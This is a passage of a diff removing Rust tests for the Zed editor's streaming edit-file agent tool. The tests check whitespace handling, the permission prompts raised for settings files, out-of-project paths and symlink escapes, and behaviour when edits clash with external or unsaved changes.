action_log, fs, thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); - - // Test with remove_trailing_whitespace_on_save enabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, 
|settings| { - settings - .project - .all_languages - .defaults - .remove_trailing_whitespace_on_save = Some(true); - }); - }); - }); - - const CONTENT_WITH_TRAILING_WHITESPACE: &str = - "fn main() { \n println!(\"Hello!\"); \n}\n"; - - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Create main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Write, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - assert_eq!( - fs.load(path!("/root/src/main.rs").as_ref()) - .await - .unwrap() - .replace("\r\n", "\n"), - "fn main() {\n println!(\"Hello!\");\n}\n", - "Trailing whitespace should be removed when remove_trailing_whitespace_on_save is enabled" - ); - - // Test with remove_trailing_whitespace_on_save disabled - cx.update(|cx| { - SettingsStore::update_global(cx, |store, cx| { - store.update_user_settings(cx, |settings| { - settings - .project - .all_languages - .defaults - .remove_trailing_whitespace_on_save = Some(false); - }); - }); - }); - - let tool2 = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log.clone(), - language_registry, - )); - - let result = cx - .update(|cx| { - tool2.run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Update main function".into(), - path: "root/src/main.rs".into(), - mode: StreamingEditFileMode::Write, - content: Some(CONTENT_WITH_TRAILING_WHITESPACE.into()), - edits: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!(result.is_ok()); - - cx.executor().run_until_parked(); - - let final_content = fs.load(path!("/root/src/main.rs").as_ref()).await.unwrap(); - assert_eq!( - final_content.replace("\r\n", "\n"), - CONTENT_WITH_TRAILING_WHITESPACE, - "Trailing whitespace should 
remain when remove_trailing_whitespace_on_save is disabled" - ); - } - - #[gpui::test] - async fn test_streaming_authorize(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; - - // Test 1: Path with .zed component should require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 1", - &stream_tx, - cx, - ) - }); - - let event = stream_rx.expect_authorization().await; - assert_eq!( - event.tool_call.fields.title, - Some("test 1 (local settings)".into()) - ); - - // Test 2: Path outside project should require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 2", &stream_tx, cx)); - - let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 2".into())); - - // Test 3: Relative path without .zed should not require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize(&PathBuf::from("root/src/main.rs"), "test 3", &stream_tx, cx) - }) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - - // Test 4: Path with .zed in the middle should require confirmation - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("root/.zed/tasks.json"), - "test 4", - &stream_tx, - cx, - ) - }); - let event = stream_rx.expect_authorization().await; - assert_eq!( - event.tool_call.fields.title, - Some("test 4 (local settings)".into()) - ); - - // Test 5: When global default is allow, sensitive and outside-project - // paths still require confirmation - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = 
settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - // 5.1: .zed/settings.json is a sensitive path — still prompts - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from(".zed/settings.json"), - "test 5.1", - &stream_tx, - cx, - ) - }); - let event = stream_rx.expect_authorization().await; - assert_eq!( - event.tool_call.fields.title, - Some("test 5.1 (local settings)".into()) - ); - - // 5.2: /etc/hosts is outside the project, but Allow auto-approves - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.2", &stream_tx, cx)) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - - // 5.3: Normal in-project path with allow — no confirmation needed - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("root/src/main.rs"), - "test 5.3", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - - // 5.4: With Confirm default, non-project paths still prompt - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Confirm; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx - .update(|cx| tool.authorize(&PathBuf::from("/etc/hosts"), "test 5.4", &stream_tx, cx)); - - let event = stream_rx.expect_authorization().await; - assert_eq!(event.tool_call.fields.title, Some("test 5.4".into())); - } - - #[gpui::test] - async fn test_streaming_authorize_create_under_symlink_with_allow(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({})).await; - fs.insert_tree("/outside", 
json!({})).await; - fs.insert_symlink("/root/link", PathBuf::from("/outside")) - .await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.default = settings::ToolPermissionMode::Allow; - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link/new.txt"), - "create through symlink", - &stream_tx, - cx, - ) - }); - - let event = stream_rx.expect_authorization().await; - assert!( - event - .tool_call - .fields - .title - .as_deref() - .is_some_and(|title| title.contains("points outside the project")), - "Expected symlink escape authorization for create under external symlink" - ); - - event - .response - .send(acp_thread::SelectedPermissionOutcome::new( - acp::PermissionOptionId::new("allow"), - acp::PermissionOptionKind::AllowOnce, - )) - .unwrap(); - authorize_task.await.unwrap(); - } - - #[gpui::test] - async fn test_streaming_edit_file_symlink_escape_requests_authorization( - cx: &mut TestAppContext, - ) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/root"), - json!({ - "src": { "main.rs": "fn main() {}" } - }), - ) - .await; - fs.insert_tree( - path!("/outside"), - json!({ - "config.txt": "old content" - }), - ) - .await; - fs.create_symlink( - path!("/root/link_to_external").as_ref(), - PathBuf::from("/outside"), - ) - .await - .unwrap(); - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", - &stream_tx, - cx, - 
) - }); - - let auth = stream_rx.expect_authorization().await; - let title = auth.tool_call.fields.title.as_deref().unwrap_or(""); - assert!( - title.contains("points outside the project"), - "title should mention symlink escape, got: {title}" - ); - } - - #[gpui::test] - async fn test_streaming_edit_file_symlink_escape_denied(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/root"), - json!({ - "src": { "main.rs": "fn main() {}" } - }), - ) - .await; - fs.insert_tree( - path!("/outside"), - json!({ - "config.txt": "old content" - }), - ) - .await; - fs.create_symlink( - path!("/root/link_to_external").as_ref(), - PathBuf::from("/outside"), - ) - .await - .unwrap(); - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let authorize_task = cx.update(|cx| { - tool.authorize( - &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", - &stream_tx, - cx, - ) - }); - - let auth = stream_rx.expect_authorization().await; - drop(auth); // deny by dropping - - let result = authorize_task.await; - assert!(result.is_err(), "should fail when denied"); - } - - #[gpui::test] - async fn test_streaming_edit_file_symlink_escape_honors_deny_policy(cx: &mut TestAppContext) { - init_test(cx); - cx.update(|cx| { - let mut settings = agent_settings::AgentSettings::get_global(cx).clone(); - settings.tool_permissions.tools.insert( - "edit_file".into(), - agent_settings::ToolRules { - default: Some(settings::ToolPermissionMode::Deny), - ..Default::default() - }, - ); - agent_settings::AgentSettings::override_global(settings, cx); - }); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - path!("/root"), - json!({ - "src": { "main.rs": "fn main() {}" } - }), - ) - .await; - fs.insert_tree( - path!("/outside"), - json!({ - "config.txt": "old content" - }), - ) 
- .await; - fs.create_symlink( - path!("/root/link_to_external").as_ref(), - PathBuf::from("/outside"), - ) - .await - .unwrap(); - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/root").as_ref()]).await; - - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let result = cx - .update(|cx| { - tool.authorize( - &PathBuf::from("link_to_external/config.txt"), - "edit through symlink", - &stream_tx, - cx, - ) - }) - .await; - - assert!(result.is_err(), "Tool should fail when policy denies"); - assert!( - !matches!( - stream_rx.try_recv(), - Ok(Ok(crate::ThreadEvent::ToolCallAuthorization(_))) - ), - "Deny policy should not emit symlink authorization prompt", - ); - } - - #[gpui::test] - async fn test_streaming_authorize_global_config(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/project", json!({})).await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - let test_cases = vec![ - ( - "/etc/hosts", - true, - "System file should require confirmation", - ), - ( - "/usr/local/bin/script", - true, - "System bin file should require confirmation", - ), - ( - "project/normal_file.rs", - false, - "Normal project file should not require confirmation", - ), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); - - if should_confirm { - stream_rx.expect_authorization().await; - } else { - auth.await.unwrap(); - assert!( - stream_rx.try_recv().is_err(), - "Failed for case: {} - path: {} - expected no confirmation but got one", - description, - path - ); - } - } - } - - #[gpui::test] - async fn test_streaming_needs_confirmation_with_multiple_worktrees(cx: &mut TestAppContext) { - init_test(cx); - let fs = 
project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/workspace/frontend", - json!({ - "src": { - "main.js": "console.log('frontend');" - } - }), - ) - .await; - fs.insert_tree( - "/workspace/backend", - json!({ - "src": { - "main.rs": "fn main() {}" - } - }), - ) - .await; - fs.insert_tree( - "/workspace/shared", - json!({ - ".zed": { - "settings.json": "{}" - } - }), - ) - .await; - let (tool, _project, _action_log, _fs, _thread) = setup_test_with_fs( - cx, - fs, - &[ - path!("/workspace/frontend").as_ref(), - path!("/workspace/backend").as_ref(), - path!("/workspace/shared").as_ref(), - ], - ) - .await; - - let test_cases = vec![ - ("frontend/src/main.js", false, "File in first worktree"), - ("backend/src/main.rs", false, "File in second worktree"), - ( - "shared/.zed/settings.json", - true, - ".zed file in third worktree", - ), - ("/etc/hosts", true, "Absolute path outside all worktrees"), - ( - "../outside/file.txt", - true, - "Relative path outside worktrees", - ), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); - - if should_confirm { - stream_rx.expect_authorization().await; - } else { - auth.await.unwrap(); - assert!( - stream_rx.try_recv().is_err(), - "Failed for case: {} - path: {} - expected no confirmation but got one", - description, - path - ); - } - } - } - - #[gpui::test] - async fn test_streaming_needs_confirmation_edge_cases(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/project", - json!({ - ".zed": { - "settings.json": "{}" - }, - "src": { - ".zed": { - "local.json": "{}" - } - } - }), - ) - .await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - let test_cases = vec![ - ("", false, "Empty path is treated as project root"), 
- ("/", true, "Root directory should be outside project"), - ( - "project/../other", - true, - "Path with .. that goes outside of root directory", - ), - ( - "project/./src/file.rs", - false, - "Path with . should work normally", - ), - #[cfg(target_os = "windows")] - ("C:\\Windows\\System32\\hosts", true, "Windows system path"), - #[cfg(target_os = "windows")] - ("project\\src\\main.rs", false, "Windows-style project path"), - ]; - - for (path, should_confirm, description) in test_cases { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let auth = - cx.update(|cx| tool.authorize(&PathBuf::from(path), "Edit file", &stream_tx, cx)); - - cx.run_until_parked(); - - if should_confirm { - stream_rx.expect_authorization().await; - } else { - assert!( - stream_rx.try_recv().is_err(), - "Failed for case: {} - path: {} - expected no confirmation but got one", - description, - path - ); - auth.await.unwrap(); - } - } - } - - #[gpui::test] - async fn test_streaming_needs_confirmation_with_different_modes(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/project", - json!({ - "existing.txt": "content", - ".zed": { - "settings.json": "{}" - } - }), - ) - .await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - let modes = vec![StreamingEditFileMode::Edit, StreamingEditFileMode::Write]; - - for _mode in modes { - // Test .zed path with different modes - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/.zed/settings.json"), - "Edit settings", - &stream_tx, - cx, - ) - }); - - stream_rx.expect_authorization().await; - - // Test outside path with different modes - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let _auth = cx.update(|cx| { - tool.authorize( - &PathBuf::from("/outside/file.txt"), - "Edit file", - &stream_tx, - 
cx, - ) - }); - - stream_rx.expect_authorization().await; - - // Test normal path with different modes - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - cx.update(|cx| { - tool.authorize( - &PathBuf::from("project/normal.txt"), - "Edit file", - &stream_tx, - cx, - ) - }) - .await - .unwrap(); - assert!(stream_rx.try_recv().is_err()); - } - } - - #[gpui::test] - async fn test_streaming_initial_title_with_partial_input(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/project", json!({})).await; - let (tool, _project, _action_log, _fs, _thread) = - setup_test_with_fs(cx, fs, &[path!("/project").as_ref()]).await; - - cx.update(|cx| { - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "src/main.rs", - "display_description": "", - })), - cx - ), - "src/main.rs" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "", - "display_description": "Fix error handling", - })), - cx - ), - "Fix error handling" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "src/main.rs", - "display_description": "Fix error handling", - })), - cx - ), - "src/main.rs" - ); - assert_eq!( - tool.initial_title( - Err(json!({ - "path": "", - "display_description": "", - })), - cx - ), - DEFAULT_UI_TEXT - ); - assert_eq!( - tool.initial_title(Err(serde_json::Value::Null), cx), - DEFAULT_UI_TEXT - ); - }); - } - - #[gpui::test] - async fn test_streaming_diff_finalization(cx: &mut TestAppContext) { - init_test(cx); - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/", json!({"main.rs": ""})).await; - let (tool, project, action_log, _fs, thread) = - setup_test_with_fs(cx, fs, &[path!("/").as_ref()]).await; - let language_registry = project.read_with(cx, |p, _cx| p.languages().clone()); - - // Ensure the diff is finalized after the edit completes. 
- { - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let edit = cx.update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Write, - content: Some("new content".into()), - edits: None, - }), - stream_tx, - cx, - ) - }); - stream_rx.expect_update_fields().await; - let diff = stream_rx.expect_diff().await; - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); - cx.run_until_parked(); - edit.await.unwrap(); - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - } - - // Ensure the diff is finalized if the tool call gets dropped. - { - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - action_log, - language_registry, - )); - let (stream_tx, mut stream_rx) = ToolCallEventStream::test(); - let edit = cx.update(|cx| { - tool.run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: path!("/main.rs").into(), - mode: StreamingEditFileMode::Write, - content: Some("dropped content".into()), - edits: None, - }), - stream_tx, - cx, - ) - }); - stream_rx.expect_update_fields().await; - let diff = stream_rx.expect_diff().await; - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Pending(_)))); - drop(edit); - cx.run_until_parked(); - diff.read_with(cx, |diff, _| assert!(matches!(diff, Diff::Finalized(_)))); - } - } - - #[gpui::test] - async fn test_streaming_consecutive_edits_work(cx: &mut TestAppContext) { - let (tool, project, action_log, _fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - // Read the file first - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - 
start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // First edit should work - let edit_result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "First edit".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "original content".into(), - new_text: "modified content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!( - edit_result.is_ok(), - "First edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); - - // Second edit should also work because the edit updated the recorded read time - let edit_result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Second edit".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "modified content".into(), - new_text: "further modified content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert!( - edit_result.is_ok(), - "Second consecutive edit should succeed, got error: {:?}", - edit_result.as_ref().err() - ); - } - - #[gpui::test] - async fn test_streaming_external_modification_matching_edit_succeeds(cx: &mut TestAppContext) { - let (tool, project, action_log, fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - // Read the file first - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // Simulate external modification - cx.background_executor - 
.advance_clock(std::time::Duration::from_secs(2)); - fs.save( - path!("/root/test.txt").as_ref(), - &"externally modified content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - - // Reload the buffer to pick up the new mtime - let project_path = project - .read_with(cx, |project, cx| { - project.find_project_path("root/test.txt", cx) - }) - .expect("Should find project path"); - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .unwrap(); - buffer - .update(cx, |buffer, cx| buffer.reload(cx)) - .await - .unwrap(); - - cx.executor().run_until_parked(); - - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit after external change".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "externally modified content".into(), - new_text: "new content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - let StreamingEditFileToolOutput::Success { - new_text, - input_path, - .. 
- } = result - else { - panic!("expected success"); - }; - - assert_eq!(new_text, "new content"); - assert_eq!(input_path, PathBuf::from("root/test.txt")); - } - - #[gpui::test] - async fn test_streaming_external_modification_mentioned_when_match_fails( - cx: &mut TestAppContext, - ) { - let (tool, project, action_log, fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - cx.background_executor - .advance_clock(std::time::Duration::from_secs(2)); - fs.save( - path!("/root/test.txt").as_ref(), - &"externally modified content".into(), - language::LineEnding::Unix, - ) - .await - .unwrap(); - - let project_path = project - .read_with(cx, |project, cx| { - project.find_project_path("root/test.txt", cx) - }) - .expect("Should find project path"); - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .unwrap(); - buffer - .update(cx, |buffer, cx| buffer.reload(cx)) - .await - .unwrap(); - - cx.executor().run_until_parked(); - - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit after external change".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "original content".into(), - new_text: "new content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = result.unwrap_err() - else { - panic!("expected error"); - }; - - assert!( - error.contains("Could not find matching text for edit 
at index 0"), - "Error should mention failed match, got: {error}" - ); - assert!( - error.contains("has changed on disk since you last read it"), - "Error should mention possible disk change, got: {error}" - ); - assert!(diff.is_empty()); - assert_eq!(input_path, Some(PathBuf::from("root/test.txt"))); - } - - #[gpui::test] - async fn test_streaming_dirty_buffer_detected(cx: &mut TestAppContext) { - let (tool, project, action_log, _fs, _thread) = - setup_test(cx, json!({"test.txt": "original content"})).await; - let read_tool = Arc::new(crate::ReadFileTool::new( - project.clone(), - action_log.clone(), - true, - )); - - // Read the file first - cx.update(|cx| { - read_tool.clone().run( - ToolInput::resolved(crate::ReadFileToolInput { - path: "root/test.txt".to_string(), - start_line: None, - end_line: None, - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await - .unwrap(); - - // Open the buffer and make it dirty - let project_path = project - .read_with(cx, |project, cx| { - project.find_project_path("root/test.txt", cx) - }) - .expect("Should find project path"); - let buffer = project - .update(cx, |project, cx| project.open_buffer(project_path, cx)) - .await - .unwrap(); - - buffer.update(cx, |buffer, cx| { - let end_point = buffer.max_point(); - buffer.edit([(end_point..end_point, " added text")], None, cx); - }); - - let is_dirty = buffer.read_with(cx, |buffer, _| buffer.is_dirty()); - assert!(is_dirty, "Buffer should be dirty after in-memory edit"); - - // Try to edit - should fail because buffer has unsaved changes - let result = cx - .update(|cx| { - tool.clone().run( - ToolInput::resolved(StreamingEditFileToolInput { - display_description: "Edit with dirty buffer".into(), - path: "root/test.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![Edit { - old_text: "original content".into(), - new_text: "new content".into(), - }]), - }), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - - let 
StreamingEditFileToolOutput::Error { - error, - diff, - input_path, - } = result.unwrap_err() - else { - panic!("expected error"); - }; - assert!( - error.contains("This file has unsaved changes."), - "Error should mention unsaved changes, got: {}", - error - ); - assert!( - error.contains("keep or discard"), - "Error should ask whether to keep or discard changes, got: {}", - error - ); - assert!( - error.contains("save or revert the file manually"), - "Error should ask user to manually save or revert when tools aren't available, got: {}", - error - ); - assert!(diff.is_empty()); - assert!(input_path.is_none()); - } - - #[gpui::test] - async fn test_streaming_overlapping_edits_resolved_sequentially(cx: &mut TestAppContext) { - // Edit 1's replacement introduces text that contains edit 2's - // old_text as a substring. Because edits resolve sequentially - // against the current buffer, edit 2 finds a unique match in - // the modified buffer and succeeds. - let (tool, _project, _action_log, _fs, _thread) = - setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Setup: resolve the buffer - sender.send_partial(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 replaces "bbb\nccc" with "XXX\nccc\nddd", so the - // buffer becomes "aaa\nXXX\nccc\nddd\nddd\neee\n". - // Edit 2's old_text "ccc\nddd" matches the first occurrence - // in the modified buffer and replaces it with "ZZZ". - // Edit 3 exists only to mark edit 2 as "complete" during streaming. 
- sender.send_partial(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, - {"old_text": "ccc\nddd", "new_text": "ZZZ"}, - {"old_text": "eee", "new_text": "DUMMY"} - ] - })); - cx.run_until_parked(); - - // Send the final input with all three edits. - sender.send_full(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit", - "edits": [ - {"old_text": "bbb\nccc", "new_text": "XXX\nccc\nddd"}, - {"old_text": "ccc\nddd", "new_text": "ZZZ"}, - {"old_text": "eee", "new_text": "DUMMY"} - ] - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "aaa\nXXX\nZZZ\nddd\nDUMMY\n"); - } - - #[gpui::test] - async fn test_streaming_create_content_streamed(cx: &mut TestAppContext) { - let (tool, project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Stream content incrementally - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\n" - })); - cx.run_until_parked(); - - // Verify buffer has partial content - let buffer = project.update(cx, |project, cx| { - let path = project - .find_project_path("root/dir/new_file.txt", cx) - .unwrap(); - project.get_open_buffer(&path, cx).unwrap() - }); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\n"); - - // Stream more content - sender.send_partial(json!({ 
- "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\nline 2\n" - })); - cx.run_until_parked(); - assert_eq!(buffer.read_with(cx, |b, _| b.text()), "line 1\nline 2\n"); - - // Stream final chunk - sender.send_partial(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\nline 2\nline 3\n" - })); - cx.run_until_parked(); - assert_eq!( - buffer.read_with(cx, |b, _| b.text()), - "line 1\nline 2\nline 3\n" - ); - - // Send final input - sender.send_full(json!({ - "display_description": "Create new file", - "path": "root/dir/new_file.txt", - "mode": "write", - "content": "line 1\nline 2\nline 3\n" - })); - - let result = task.await; - let StreamingEditFileToolOutput::Success { new_text, .. } = result.unwrap() else { - panic!("expected success"); - }; - assert_eq!(new_text, "line 1\nline 2\nline 3\n"); - } - - #[gpui::test] - async fn test_streaming_overwrite_diff_revealed_during_streaming(cx: &mut TestAppContext) { - let (tool, _project, _action_log, _fs, _thread) = setup_test( - cx, - json!({"file.txt": "old line 1\nold line 2\nold line 3\n"}), - ) - .await; - let (mut sender, input) = ToolInput::::test(); - let (event_stream, mut receiver) = ToolCallEventStream::test(); - let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - - // Transition to BufferResolved - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - })); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Overwrite file", - "path": "root/file.txt", - "mode": "write" - })); - cx.run_until_parked(); - - // Get the diff entity from the event stream - receiver.expect_update_fields().await; - let diff = receiver.expect_diff().await; - - // Diff starts pending with no revealed ranges - diff.read_with(cx, |diff, cx| { - assert!(matches!(diff, Diff::Pending(_))); - 
